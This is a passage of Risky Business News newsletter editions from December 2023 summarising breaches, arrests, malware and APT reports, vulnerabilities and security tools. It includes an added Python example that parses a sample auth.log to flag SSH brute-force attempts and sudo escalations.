Lapsus$ member handed indefinite hospital order: A UK judge has sentenced a member of the Lapsus$ hacking crew to an indefinite hospital order. Arion Kurtaj from Oxford, 18, was diagnosed with severe autism and was deemed unfit to stand trial. Kurtaj was directly involved in Lapsus$ breaches at Nvidia and BT/EE. He also hacked Rockstar Games and leaked images of the upcoming GTA6 game while on bail. [Additional coverage in the BBC]

FruitFly malware author case: On the same note, a US court found Phillip Durachinsky, the creator of the FruitFly macOS spyware, incompetent to stand trial because of his autism spectrum disorder. [Additional coverage in Cleveland.com]

FACCT exec to be extradited to Russia: Kazakh officials have agreed to extradite an exec of Russian cybersecurity firm FACCT—the former Russian branch of Group-IB—to Russia. Nikita Kislitsin was initially detained following an international arrest warrant issued in the US. Russia filed its own hoax indictment days later and requested his extradition as well. [Additional coverage in TASS/ English coverage in The Record]

Operation HAECHI IV: Interpol detained more than 3,500 suspects and seized nearly $300 million as part of a crackdown against cybercrime groups the agency calls Operation Haechi IV. Officials said the suspects were involved in cyber-enabled scams, such as voice phishing, romance scams, online sextortion, BEC, and investment fraud.

Digital skimming campaign disrupted: Europol and Group-IB have identified and notified the owners of 443 merchants that had digital skimmers installed on their online stores.

Kingdom Market takedown: German officials have seized Kingdom Market, a dark web marketplace selling drugs, hacking tools, and fake IDs. The portal launched in March 2021 and was accessible via both Tor and I2P. The site's admin, a Slovakian man, was also charged in the US.

Crypto-drainer attacks: A threat actor has used Google and Twitter ads to lure victims to phishing sites running so-called crypto drainers, scripts that empty a wallet once the victim connects it and approves the site's transactions. The group is believed to have stolen $58.98 million from more than 63,210 victims over the past nine months.

Carding scene stats: More than 71.4 million card details were posted for sale on underground carding shops, and more than 48 million card details were posted online for free throughout 2023, according to Recorded Future's Payment Fraud Year in Review report.

PyPI malware: ReversingLabs has identified five malicious Python libraries uploaded on the official PyPI portal. This batch abused GitHub Gists, issuing commands through Git commit messages.

Malicious Chrome and Edge extensions: ReasonLabs have found three Chrome and Edge browser extensions disguised as VPN tools that hijacked users' browsers to install other extensions, steal user data, and more.

Lumma usage explodes: ESET has published its threat report for H2 2023, and among the report's main findings is the sudden rise in Lumma Stealer detections.

Carbanak returns: Old malware from the Carbanak banking heists gang has been spotted in attacks throughout November 2023, used in intrusions that ended in ransomware attacks, according to the NCC Group.

Intellexa and Cytrox: Cisco Talos has published a history of Intellexa and Cytrox, two major spyware vendors.

  • Talos' analysis revealed that rebooting an iOS or Android device may not always remove the Predator spyware produced by Intellexa. Persistence is an add-on feature provided by Intellexa for their implants and primarily depends on the licensing options chosen by a customer.

  • Intellexa knows if their customers intend to perform surveillance operations on foreign soil.

  • Two years after its first public exposure, Intellexa’s Predator/Nova spyware solution continues to be undetected by anti-virus solutions.

KEV update: CISA has updated its KEV database with two vulnerabilities that are being exploited in the wild. The two are CVE-2023-49897 and CVE-2023-47565, two command injection flaws in FXC routers and QNAP VioStor NVRs, exploited by a Mirai botnet and the InfectedSlurs botnet, respectively.

Atlassian exploitation: Internet scanning service GreyNoise warns of a rise in attacks targeting Atlassian systems.

Old Excel bug campaign: A threat actor is leveraging a 2017 Excel RCE to infect users with the Agent Tesla infostealer. More from Zscaler.

Nim campaign: Netskope looks at a phishing campaign spreading a Nim-based backdoor using emails claiming to come from the Nepali government.

BattleRoyal: Proofpoint has published a report detailing BattleRoyal, a threat actor behind a wave of phishing campaigns that are redirecting users to websites hosting fake browser update schemes that infect victims with the DarkGate and NetSupport malware.

Smishing Triad: Resecurity reports on new smishing campaigns carried out by the Smishing Triad group. See previous reports from August and September.

Malware technical reports

JaskaGO: AT&T's Alien Labs security team looks at JaskaGO, a new malware strain targeting macOS and Windows systems. As the name suggests, the malware is written in Go.

Bandook: Fortinet has analyzed the C&C mechanism of Bandook, a remote access trojan that has been used in attacks since 2007.

Akira: Sophos researchers have published a report on the recent tactics and IOCs employed by the Akira ransomware group.

Chameleon: A new version of the Chameleon Android banking trojan now disables fingerprint and facial scanning features as a way to bypass biometric authentication and take over devices.

Xamalicious: McAfee has published a report on Xamalicious, a new Android backdoor coded using Xamarin, an open-source framework that allows building Android and iOS apps with .NET and C#.

Operation HamsaUpdate: Intezer looks at a phishing campaign that targeted Israeli companies with emails claiming to be from networking equipment vendor F5.

"The campaign leverages a convincingly written email in Hebrew and utilizes sophisticated social engineering techniques, pressuring victims to execute the harmful code residing on their servers. The final attack delivers a complex, multi-stage loader or a destructive wiper, each variant customized for either Linux or Windows environments. [...] We’ve dubbed the Windows variant Hatef and the Linux variant Hamsa. During our analysis, we unearthed a second-stage loader coded in Delphi—which spearheads the execution of an AutoIt injector. This injector has been given the name Handala."

Sponsor Section

In this product demo, GreyNoise founder and CEO Andrew Morris demonstrates how people use the GreyNoise sensor network.

APTs, cyber-espionage, and info-ops

Peach Sandstorm: Iranian hacking group Peach Sandstorm (APT33, Holmium) is targeting defense companies across the world in attacks aiming to deploy a new backdoor named FalseFont. The backdoor was first spotted at the end of November, and the group is known for its broad use of password-spraying attacks.

OilRig's Menorah: SecurityScorecard's Vlad Pasca has a technical breakdown of Menorah, a backdoor used by the OilRig (APT34) Iranian espionage group.

Kimsuky's AppleSeed: AhnLab researchers have published an analysis of AppleSeed, a macOS malware strain used by North Korean hacking group Kimsuky.

UAC-0050: Ukraine's CERT team is seeing new UAC-0050 spear-phishing targeting Ukrainian organizations.

UAC-0099: DeepInstinct researchers look at a UAC-0099 spear-phishing campaign targeting Ukrainian officials with CVE-2023-38831, a former zero-day in the WinRAR app.

Cloud Atlas: Russian security firm FACCT has published a report on attacks against Russian companies by Cloud Atlas, an APT group that has been active since 2014.

Vulnerabilities, security research, and bug bounty

New Barracuda zero-day: On Christmas Eve, Barracuda disclosed the existence of a zero-day in its ESG appliance (CVE-2023-7102). Barracuda says it deployed a security update to all active ESG appliances on December 21 that was applied automatically and then deployed a second patch the following day to ESG appliances that exhibited indicators of compromise for new variants of the SEASPY and SALTWATER malware. The company attributed the attacks to UNC4841, the same Chinese group that exploited its appliances last year.

Chrome zero-day: Google has pushed a security update for Chrome browsers to fix an actively exploited zero-day (CVE-2023-7024).

CLFS exploits: Kaspersky shares a list of five exploits in the Windows Common Log File System (CLFS) driver that have been used over the past year by ransomware gangs as part of their intrusions.

Buffalo VPN router bugs: NSLabs researchers have found three vulnerabilities in Buffalo VR-S1000 VPN routers.

Ivanti Avalanche vulnerabilities: Ivanti has released patches for 20 vulnerabilities in its Avalanche MDM product.

Roundcube 2FA bypass: Security researcher Chand Singh has published details on CVE-2023-43837, a 2FA bypass in Roundcube's webmail plugin.

2023 vulnerability threat landscape: More than 26,000 vulnerabilities were reported this year, but fewer than 1% were routinely exploited in the wild, according to the Qualys 2023 Threat Landscape report.

Infosec industry

New tool—Troll-A: Security firm Crissy Field has released Troll-A, a tool to extract passwords, API keys, and tokens from WARC (Web ARChive) files.

New tool—AuthLogParser: Eilay Yosfan from Security Joes has published AuthLogParser, a DFIR tool designed for analyzing Linux authentication logs, commonly known as auth.log.
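What that kind of analysis looks like in practice, as an added Python example that is not AuthLogParser's own code: parse sshd and sudo entries out of syslog-style auth.log lines, then flag password-guessing sources, a login that succeeds right after a failure streak from the same source, and sudo escalations to root. The log lines, host name and addresses are constructed for the example.

```python
import re
from collections import defaultdict

# Constructed auth.log excerpt in the traditional syslog format (not real data):
# a password-guessing run from one address that ends in a successful root login,
# a normal key-based login, and a sudo to root.
SAMPLE_AUTH_LOG = """\
Jan  2 10:14:01 web1 sshd[2211]: Failed password for invalid user admin from 203.0.113.7 port 51522 ssh2
Jan  2 10:14:03 web1 sshd[2211]: Failed password for invalid user admin from 203.0.113.7 port 51522 ssh2
Jan  2 10:14:05 web1 sshd[2214]: Failed password for root from 203.0.113.7 port 51530 ssh2
Jan  2 10:14:07 web1 sshd[2216]: Failed password for root from 203.0.113.7 port 51534 ssh2
Jan  2 10:14:09 web1 sshd[2218]: Failed password for root from 203.0.113.7 port 51540 ssh2
Jan  2 10:14:12 web1 sshd[2220]: Accepted password for root from 203.0.113.7 port 51544 ssh2
Jan  2 10:20:31 web1 sshd[2301]: Accepted publickey for deploy from 198.51.100.22 port 40112 ssh2: ED25519 SHA256:abc
Jan  2 10:21:02 web1 sudo:   deploy : TTY=pts/0 ; PWD=/home/deploy ; USER=root ; COMMAND=/usr/bin/systemctl restart nginx
Jan  2 10:25:44 web1 sshd[2355]: Accepted password for root from 203.0.113.7 port 51600 ssh2
"""

# "Mon DD HH:MM:SS host process[pid]: message" (the pid is optional, e.g. for sudo)
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) "
    r"(?P<proc>[\w/.-]+)(?:\[\d+\])?: (?P<msg>.*)$"
)
SSH_RE = re.compile(
    r"^(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)
SUDO_RE = re.compile(r"^\s*(?P<user>\S+) : .*USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$")


def parse_auth_log(text):
    """Turn auth.log lines into event dicts; lines we do not understand are ignored."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        proc, msg = m["proc"], m["msg"]
        if proc == "sshd" and (s := SSH_RE.match(msg)):
            events.append({"ts": m["ts"], "type": "ssh", **s.groupdict()})
        elif proc == "sudo" and (s := SUDO_RE.match(msg)):
            events.append({"ts": m["ts"], "type": "sudo", **s.groupdict()})
    return events


def analyze(events, fail_threshold=3):
    """Flag sources with many failures, a login that succeeds right after a
    failure streak from the same source (a guess that landed), and sudo to root."""
    streak, total = defaultdict(int), defaultdict(int)
    findings = {"brute_force": {}, "success_after_failures": [], "sudo_to_root": []}
    for ev in events:
        if ev["type"] == "ssh":
            ip = ev["ip"]
            if ev["result"] == "Failed":
                streak[ip] += 1
                total[ip] += 1
            else:
                if streak[ip] >= fail_threshold:
                    findings["success_after_failures"].append((ip, ev["user"], ev["method"]))
                streak[ip] = 0  # the streak ends on success; later successes are not re-flagged
        elif ev["type"] == "sudo" and ev["target"] == "root":
            findings["sudo_to_root"].append((ev["user"], ev["cmd"]))
    findings["brute_force"] = {ip: n for ip, n in total.items() if n >= fail_threshold}
    return findings


if __name__ == "__main__":
    for kind, hits in analyze(parse_auth_log(SAMPLE_AUTH_LOG)).items():
        print(kind, hits)
```

On the sample, 203.0.113.7 is reported for five failures and for the root password login that followed them, and deploy's sudo to root is listed; the key-based deploy login from 198.51.100.22 is not flagged. The threshold is a parameter because what counts as a brute-force attempt depends on the host's normal traffic, and the streak is reset on success so the later root login from the same address is attributed to the session, not reported twice.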

New tool—SysReptor: Something we missed from May

New tool—Shadow-Pulse: Security researcher StrangerealIntel has published a spreadsheet with basic details on every major ransomware operation.

New tool—SigmaToARM: Redcentric's Ollie Legg has released SigmaToARM, a tool to convert Sigma rules to Azure ARM templates.

New tool—Ghidriff: A security researcher from ClearSecLabs has open-sourced a tool named Ghidriff, a binary-diffing engine for Ghidra.

Tool update—Ghidra: The NSA has released v11 of its Ghidra reverse engineering toolkit. The biggest update is initial support for Rust binaries.

Acquisition news: Cisco has acquired multi-cloud security startup Isovalent, known for its eBPF-based open-source projects Cilium and Tetragon.

WaPo retires Cybersecurity 202: The Washington Post has retired its Cybersecurity 202 newsletter as part of recent layoffs.

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq talk about recent hints that the Ukrainian government has figured out how to make use of the IT Army.

Risky Biz News: FBI disrupts AlphV/BlackCat ransomware;

20 December 2023 at 01:30

You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:

The RiskyBiz crew behind our newsletters and podcasts is on hiatus between December 8 and January 8 for the winter holidays, but we put out this weekly edition with some of the past week's biggest infosec stories.

Happy holidays!


Breaches, hacks, and security incidents

Cyberattack on Iranian gas stations: A hacktivist group known as Predatory Sparrow has crippled the payment systems of gas stations across Iran. The incident is believed to have impacted more than 2,000 of the country's gas pumps (~70% of all pumps). Iranian officials have confirmed the incident and claimed the group is a front for Israeli and US cyber operations. BBC Persia claims the incident had a sprawling impact across the country, even days after the attack.

Ledger incident: A threat actor has compromised the npm account of a former Ledger employee and added malicious code to a Ledger SDK meant to connect web apps to the Ledger backend. The malicious code emptied Ledger wallets on websites that used the compromised SDK. Losses are estimated to be around $600,000.

Comcast hack: US telco Comcast says that hackers exploited the CitrixBleed vulnerability to breach one of its systems and steal the personal information of almost 36 million customers. Comcast says the hack took place between October 16 and October 19, 2023.

Mr. Cooper hack: Mortgage and lending company Mr. Cooper says the ransomware attack that hit its IT systems at the end of October led to the theft of personal data of almost 14.7 million customers.

Coin Cloud hack: Hackers claim to have stolen the personal data of more than 300,000 customers of now-defunct Bitcoin ATM provider Coin Cloud. The hackers claim the data also includes more than 70,000 pictures of customers taken using the ATMs' cameras. [Additional coverage in TechCrunch]

MongoDB hack: The company behind the MongoDB database has announced a security breach of its corporate systems. The breach took place on December 13, and attackers appear to have gotten their hands on some customer data. MongoDB says they have not seen any unauthorized access to customer cloud environments (so far).

Kyivstar attribution: A hacking group named Solntsepek took credit for the attack that crippled Kyivstar, Ukraine's largest mobile telco. Ukrainian officials have attributed the attack to a hacking unit linked to Russia's military intelligence service GRU. Solntsepek has been previously linked to Sandworm.

OKX crypto-heist: A threat actor has stolen $2.7 million worth of crypto assets from OKX after they gained access to one of the platform's smart contracts keys.

Aurory crypto-heist: The Aurory cryptocurrency exchange has been hacked for $1.2 million worth of assets. The attacker apparently drained 80% of the company's liquidity pools. The platform has shut down all operations to investigate the hack.

NFT Trader crypto-heist: A threat actor exploited a vulnerability in the NFT Trader platform and stole $3 million worth of NFTs. NFT Trader blamed the bug on one of its third-party tools—like that would make their users feel better for some reason. The culprit seems to be the Flooring Protocol.

General tech and privacy

Windows Protected Print Mode: Microsoft has announced Windows Protected Print Mode (WPP), a more secure rewrite of the Windows print mode, the feature that allows the operating system to interact with printing devices. The new WPP mode was designed around the Internet Printing Protocol (IPP) and removes the need for third-party printing drivers, which are set to be phased out in the coming years. Microsoft says the new mode will be available for testing via Insiders builds and should work fine with most printers made in the last 10 years.

SAC in Windows 11: Germany's BSI has published a technical analysis of the new Smart App Control feature in Windows 11. It's in German, though.

Google Maps geolocation data update: Google has changed how its Maps app stores geolocation data. Going forward, Maps will store all user location data on the device instead of Google's servers. The company made the change after law enforcement agencies had been abusing geo-fencing warrants to mass-collect data on everyone who entered a specific geographical area, whether they were suspects or not.

Apple to require warrants for push notification data: Apple has updated its legal guideline [PDF] and will now require law enforcement agencies to obtain warrants for its users' push notification data. The new rules were put in place after a US senator exposed that law enforcement agencies from different countries were requesting push notification metadata from both Apple and Google as part of their investigations. [Additional coverage in The Verge]

Apple Stolen Device Protection: Apple is rolling out a new iOS feature named Stolen Device Protection that, when enabled, will require users to authenticate using Face ID or Touch ID before making changes to sensitive device settings. Besides requiring a facial scan or fingerprint scan, the Stolen Device Protection feature also adds a one-hour delay before changes are applied, allowing real device owners to still have access to their accounts and devices and prevent being locked out. [Additional coverage in MacRumors]

Passcode 5th Amendment: The Utah Supreme Court has ruled that suspects can refuse to hand over their phone passcode to police during an investigation. The court unanimously ruled that passcodes fall under the protection of the US Constitution's Fifth Amendment, which protects citizens from self-incrimination. [Additional coverage in ArsTechnica]

NGO sues Adobe: A Dutch NGO has sued Adobe for using browser cookies to track the web activity of Dutch citizens.

Active Listening: Marketing materials from the Cox Media Group claim the company can tap into customer device microphones (smartphones, TVs, etc.) and listen to nearby conversations. Named Active Listening, the feature is touted as a way to improve ad delivery. [Additional coverage in 404 Media]

Firefox 121: Mozilla has released Firefox 121. New features and security fixes are included. The biggest changes in this release are Wayland-by-default on Linux and an option in the settings page to force Firefox to underline all links.

Weibo tells users to be careful: Chinese social media company Weibo has told users to avoid expressing pessimism about the economy.

Spam bots come to Mastodon: Several Mastodon instances have been dealing with a giant wave of spam accounts over the past week.

Dropbox AI drama: Dropbox has a new "AI" feature that will take your files and share them with OpenAI. Obviously, most users didn't know about it. [Additional coverage in ArsTechnica]

Threads TOS drama: Mastodon server admins and their users are in shock to find out that Meta has given itself the right to scrape everyone's data and track their activity once Threads federates with Mastodon instances and anyone interacts with a single piece of Threads content. I kid you not!

Government, politics, and policy

EU starts Twitter investigation: EU officials have opened an official investigation into Twitter for "the dissemination and amplification of illegal content and disinformation in the EU, transparency of the platforms and design of the user interface." The investigation comes days after an Irish newspaper reported that Musk intentionally crippled the platform's ability to remove disinformation, CSAM, and other illegal content.

NCSC CEO leaving: The CEO of the UK NCSC cyber agency is leaving her post for a diplomatic post. [Additional coverage in The Record]

Pegasus in Poland: A Polish court has confirmed that Polish state TV service TVP used manipulated SMS messages that were stolen from an opposition leader using the Pegasus spyware. The report confirms—yet again—that the former Polish government used the Pegasus spyware in politically motivated operations rather than legitimate law enforcement operations. [Additional coverage in OKO Press]

China's incident classification tiers: The Chinese government is working on a four-tier system that will be used to classify cybersecurity breaches and related incidents. The four tiers are color-coded and go from blue to yellow to orange and then red based on an incident's severity and impact on citizens and national security.

China warns of foreign backdoors: The Chinese Ministry of State Security says an "extensive investigation" found backdoors in overseas geolocation software that was being used to collect data from Chinese firms. [Additional coverage in Reuters/non-paywall]

China's iPhone ban expands: More and more Chinese government agencies and state-controlled companies are imposing bans on using iPhones at work. The new ban has been described as a "major step up" from the initial ban in September, which only impacted the highest levels of the Chinese government. [Additional coverage in AppleInsider]

FISA S702 temporary renewal: US lawmakers have temporarily extended the FISA Section 702 surveillance powers until April 19, 2024, to give themselves more time to negotiate. Section 702 is expiring at the end of the year. [Additional coverage in The Record]

CISA SbD alert: CISA issued its third Secure by Design security advisory. This one urges software makers to stop using static default passwords for their products.

FCC adopts new data breach rules: The US Federal Communications Commission has adopted new data breach notification rules for US telcos. The new rules remove the need to notify users of a data breach if no harm is likely to occur, expand the scope of a breach to cover accidental data exposures to telco employees and their providers, add mandatory breach reporting to the FCC itself, and remove breach notification waiting periods—meaning telcos have to notify users as soon as possible.

Foreign election interference: The US ODNI has published a report detailing the foreign interference that took place during the 2022 US Midterm Elections. The report notes that while China interfered, it did so for both parties. On the other hand, Russia focused many efforts on trying to denigrate the Democratic Party and its support for Ukraine.

US Senate confirms Haugh: The US Senate has confirmed Air Force Lt. Gen. Timothy Haugh as the next head of the NSA and US Cyber Command.

NSA cybersecurity year in review: The NSA has published its cybersecurity year-in-review report.

A chart showing some of the NSA cybersecurity statistics

Risky Business Podcasts

In this podcast, Patrick Grey and Tom Uren talk about whether election interference will take place in the Taiwanese, US, and Russian elections that are all taking place in 2024. They also look at a ChatGPT-powered online harassment campaign.

Cybercrime and threat intel

FBI disrupts AlphV ransomware: US authorities have hacked and seized server infrastructure operated by the AlphV (BlackCat) ransomware gang. Authorities say they also recovered 500 encryption keys, which they are now offering together with a decrypter to all affected victims. This confirms rumors from last week.

Screenshot of the AlphV dark web leak site with a seizure banner posted by US authorities

Pig-butchering gang detained: US authorities have unsealed charges against four suspects (detained two) for their role in a sprawling crypto-investment scheme (aka pig butchering) that netted them $80 million.

Nirvana Finance hacker pleads guilty: Shakeeb Ahmed, 34, of New York, pleaded guilty to hacking the smart contract of Nirvana Finance and stealing $12.3 million from the company and its users. US authorities said Ahmed was the first person arrested in the US for hacking a smart contract. Ahmed used to work for Amazon.

Storm-1152 disrupted: Microsoft took legal action to disrupt the server infrastructure of Storm-1152, a threat actor who created and sold access to more than 750 million Microsoft accounts. The accounts were used to help other bad actors avoid identity checks and carry out online fraud. In addition, the group ran a service to help crooks bypass online CAPTCHA tools. As part of the legal case, Microsoft named three Vietnamese men as Storm-1152 members. They were identified in court records as Duong Dinh Tu, Linh Van Nguyễn, and Tai Van Nguyen.

Screenshot of Duong Dinh Tu's YouTube profile

Qakbot returns: Several security researchers have spotted new activity from the Qakbot botnet, which US and European officials disrupted back in August. This comeback was first spotted by Censys at the end of November.

Mobile banking malware: Zimperium has published its yearly report on the mobile banking malware landscape. The company says it spotted 29 mobile banking malware strains this year, targeting more than 1,800 banking applications across 61 countries. The top banking malware was Hook, which targeted 618 e-banking apps. The most targeted country was the US, with 109 banks targeted.

Chart of the most popular Android banking trojans

Magento wish list exploit: Sansec researchers have documented a series of attacks against the wish list function of Magento 2 e-commerce sites.

Target hacker hunt: Infosec reporter Brian Krebs has managed to untie and unwind new knots in his hunt for the Target hacker, an individual known as Rescator.

Ransomware figures: According to court data, French authorities have started 512 ransomware-related investigations in 2023, representing a new record for the European country. On that note, both SentinelOne and Guidepoint have also published reports on recent developments in the ransomware ecosystem, covering numbers and recent tactics. [Additional coverage in ZDNet France]

Ransomware and the press: Sophos researchers look at how ransomware gangs have been using and interacting with journalists as part of their day-to-day operations and extortion campaigns.

Wazawaka profile: Prodaft researchers have published a profile on Wazawaka, an infamous ransomware affiliate identified by US authorities as Russian national Mikhail Matveev. The report looks at Matveev but also his team, including other threat actors such as 777, bobr.kurwa, krbtgt, shokoladniy_zayac, WhyNot, and dushnila.

Chart showing the structure and timeline of the Wazawaka network

Malvertising campaign: Malwarebytes has been tracking malvertising campaigns leveraging Google search ads for stuff like WinSCP and Zoom to deliver payloads like PikaBot and the HiroshimaNukes or FakeBat loaders.

UNC2975: On the same topic, Google's Mandiant division looks at UNC2975, which the company describes as one of the largest clusters of malvertising activity today.

DarkSide member moves to malvertising: ConnectWise researchers have spotted a former member of the DarkSide ransomware gang delivering trojanized apps using malicious ads on search result pages.

Stockpiled domains: Palo Alto Networks says it identified more than 1.1 million stockpiled domains that are likely to be used in future malicious campaigns.

"Automation employed by attackers can leave traces of information about their campaigns in various data sources. Security defenders can find these traces in locations such as certificate transparency logs (e.g., certificate field reputation or timing information) and passive DNS (pDNS) data (e.g., infrastructure reuse or characteristics)."

OLVX: ZeroFox has published a report on OLVX, a new underground cybercrime shop selling access to hacked servers via shells, RDP, SSH, SMTP, webmail, cPanel, and others. The site also sells compromised accounts, combolists, and phishing kits.

8220 Gang: Imperva looks at the 8220 Gang—a cryptomining operation—targeting Oracle WebLogic servers via a vulnerability tracked as CVE-2020-14883.

GambleForce: A new threat actor named GambleForce has been using SQL injection attacks to breach government and gambling sites in the APAC region.

Chart showing GambleForce activity

Malware technical reports

NKAbuse: Kaspersky has identified a new botnet targeting Linux systems. Named NKAbuse, the botnet gets its name from its use of the NKN protocol for its C2 channel.

InfectedSlurs botnet: Akamai is seeing the InfectedSlurs botnet expand its attack arsenal and go after QNAP VioStor NVR devices using CVE-2023-47565.

Vetta Loader: Italian security firm YOROI has published a technical report on Vetta Loader, a new malware strain hitting Italy and spreading through infected USB devices.

BazarCall: Abnormal Security has seen a new wave of BazarCall phishing campaigns. The technique was in fashion in 2020-2021 but has somewhat lost steam in recent years.

Rhadamanthys: Check Point has published a technical deep-dive into the Rhadamanthys infostealer. Its latest version comes with additional spying features and a plugin system.

New banking trojan: IBM X-Force has looked at a new banking trojan—possibly related to DanaBot—employing a new web injection module that targets more than 40 banks across North America, South America, Europe, and Japan.

DanaBot: And since we're on DanaBot, OALABS has published some recent IOCs on the malware.

BatLoader and FakeBat: eSentire looks at two Russian Malware-as-a-Service platforms (BatLoader and FakeBat) and their recent operations abusing Google search ads.

BianLian: Security researcher Cryptax has published an analysis of the BianLian Android banking trojan (not to be confused with the ransomware operation).

Play and AlphV: CISA has published technical advisories on the Play and AlphV ransomware strains. According to CISA, AlphV asked for $500 million in ransoms and received nearly $300 million.

Kuiper ransomware: Stairwell looks at Kuiper, a new Ransomware-as-a-Service operation that has been advertised on underground forums since September.

An ad for the Kuiper ransomware RaaS

Sponsor Section

In this product demo, GreyNoise founder and CEO Andrew Morris demonstrates how people use the GreyNoise sensor network.

APTs, cyber-espionage, and info-ops

OilRig: ESET looks at four new OilRig downloaders, named SampleCheck5000, OilCheck, ODAgent, and OilBooster.

MuddyWater: Broadcom's Symantec looks at a MuddyWater (Seedworm) campaign targeting telcos in Egypt, Sudan, and Tanzania.

Gaza Cybergang: SentinelOne looks at Pierogi++, a new backdoor used by the Gaza Cybergang in 2022 and 2023 operations targeting Hamas opposition.

SideWinder: CyFirma researchers look at SideWinder's macro malware arsenal. SideWinder, also known as Rattlesnake, is a suspected Pakistani APT group.

Kasablanka: Qihoo 360 looks at Kasablanka APT attacks targeting the Nagorno-Karabakh region with VenomRAT payloads.

DPRK recruitment ops: NISOS researchers look at online personas used by DPRK operators to fraudulently obtain remote employment from unwitting companies in the United States.

UAC-0177 (JokerDPR): Ukraine's CERT team has published IOCs for UAC-0177 (JokerDPR), the hacking group that claimed last year to have hacked Ukraine's Delta military communications platform. The group has also amplified Russian disinformation efforts about the war in Ukraine.

Calisto APT: Sekoia has published its own (previously private) report on how they identified Russian individual Andrey Korinets as a member of the Calisto (Star Blizzard, Cold River) APT—recently sanctioned by the UK and charged by the US.

APT29 alert: CISA, the NCSC, and Poland's CERT team and SKW service warn that APT29 (linked to Russia's SVR intelligence agency) is exploiting a vulnerability (CVE-2023-42793) in JetBrains TeamCity servers for initial access to corporate and government systems. Fortinet and Logpoint also looked at the same attacks. According to the Shadowserver Foundation, more than 800 unpatched TeamCity servers were still connected online last week.

Fortinet chart of an attack on a TeamCity server

Volt Typhoon: Lumen has linked the new KV-botnet to the Volt Typhoon Chinese cyber-espionage group. Comprised of unpatched Cisco, Netgear, and Fortinet devices, the botnet has been used as a proxy and covert data transfer network.

"We assess from both our telemetry and open-source reporting, that the use of this botnet is limited to Chinese state-sponsored organizations. Thus far the victimology Black Lotus Labs has observed from the KV-cluster aligns primarily with a strategic interest in the Indo-Pacific region, having a particular focus on ISPs and government organizations. At least one user of the KV-cluster is Volt Typhoon, but Volt Typhoon is believed to operate over other obfuscation networks as well. We believe that it would be unlikely for the threat actor to repurpose this network to target lower valued networks and risk its discovery."

Chinese info-op targeting US: ASPI researchers have found a network of YouTube accounts pushing pro-Chinese and anti-US narratives and misinformation. Many of the videos used generative AI. The world of at-scale AI-generated misinformation is upon us.

Chinese info-op in Taiwan: In a different report, Graphika researchers say they found thousands of inauthentic accounts across Facebook, YouTube, and TikTok attacking pro-independence parties and pushing pro-Chinese propaganda in Taiwan ahead of the country's election in January 2024.

Another Chinese info-op: On the same front, ISD has seen new Spamouflage activity pushing pro-Chinese and anti-US narratives and misinformation.

Google info-op report: Google has published its quarterly report on influence operations on its websites. Lots of Chinese and Russian operations are mentioned.

TikTok info-ops: TikTok has published its Q3 threat report that looked at the influence operations the company spotted on its site. Six of the 16 campaigns were related to Russia's invasion of Ukraine.

ANSSI alert on telco attacks: France's cybersecurity agency has published a security advisory warning of increasing APT attacks targeting the telecommunications sector.

Vulnerabilities, security research, and bug bounty

Zoom unveils VISS: Video conferencing software maker Zoom has unveiled VISS, a new vulnerability impact scoring system.

"By objectively measuring the impact of vulnerabilities from a defender's perspective, VISS can base its evaluations on responsibly demonstrated exploitation rather than theoretical threats."

Terrapin attack: A team of academics has published details on Terrapin, a new attack against the SSH protocol. The attack requires an AitM position but can be used to downgrade SSH connections to less secure states. SSH implementers and vendors, such as SUSE and PuTTY, have been notified and are rolling out patches. The attack is tracked as CVE-2023-48795.

Marvin attack impacts Rust: The Marvin cryptographic attack was found to also impact Rust's RSA implementation.

Opera address bar spoofing: Opera's mobile browsers are vulnerable to a bunch of address bar spoofing attacks.

AWS WAF bypass: BCK Security researchers found and helped patch a bypass of the AWS WAF.

Unpatched GWT vulnerability: BishopFox researchers look at an eight-year-old and still unpatched vulnerability in the Google Web Toolkit framework.

Unpatched Google OAuth vulnerability: TruffleSecurity published details about a Google OAuth vulnerability that lets former employees retain access to corporate apps even after they've been off-boarded and removed from their employer's Google organization. Google has not patched the reported issue.

Perforce vulnerabilities: Microsoft has identified four vulnerabilities in Perforce Helix Core Server, a source code management platform widely used in the video game industry. The vulnerabilities include one unauthenticated RCE (CVE-2023-45849) with a 10.0 severity rating.

KingConnect vulnerabilities: White Oak Security has found four vulnerabilities in KingConnect routers, including an unauth RCE. KingConnect did not respond to the responsible disclosure process, so the bugs are unpatched.

Nagios vulnerabilities: NCC Group researchers have discovered 16 vulnerabilities in the Nagios XI remote monitoring toolkit.

Outlook RCE: Akamai has published a two-part writeup on two Outlook vulnerabilities (CVE-2023-35384 and CVE-2023-36710) that can be chained for RCE attacks on Outlook instances.

SMTP Smuggling: SEC Consult has published details on SMTP Smuggling, a new technique for spoofing emails while not breaking SPF checks. Email servers from Cisco, GMX, and Microsoft were found to be affected, all of which have released fixes or mitigations.

Mobile telephony vulnerability: Dvuln researchers have described a method through which attackers could abuse tel:// links in SMS messages to trick users into setting up unauthorised call forwarding on their devices.

Log4Shell exposure shrinks: Research by VulnCheck has found that two years after its disclosure, very few systems are still exposed to attacks via the Log4Shell vulnerability.

"The current footprint of internet-facing software that is potentially vulnerable to code execution via Log4Shell is approximately 125,000 hosts. Of the 125,000 hosts, approximately 95% are using known patched versions. Although many predicted a long tail of exploitation, two years after disclosure, there are very few remaining Log4Shell initial access targets."

Chart showing Log4Shell exposure on the internet

Infosec industry

Acquisition news: Identity provider Okta is acquiring Israeli cybersecurity startup Spera for at least $100 million.

MITRE EMB3D: The MITRE Corporation has launched EMB3D, a threat model specifically designed for embedded devices.

New tool—YARA-Forge: Florian Roth has launched a new project named YARA-Forge, a tool designed to streamline the process of sourcing, standardizing, and optimizing YARA rules.

New tool—SSH3: Belgian PhD student François Michel has open-sourced SSH3, a version of the SSH protocol that uses HTTP/3, QUIC, and TLS 1.3.

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq talk about recent hints that the Ukrainian government has figured out how to make use of the IT Army.

Risky Biz News: Ukraine intelligence hacks and wipes Russia's tax agency

13 December 2023 at 02:23

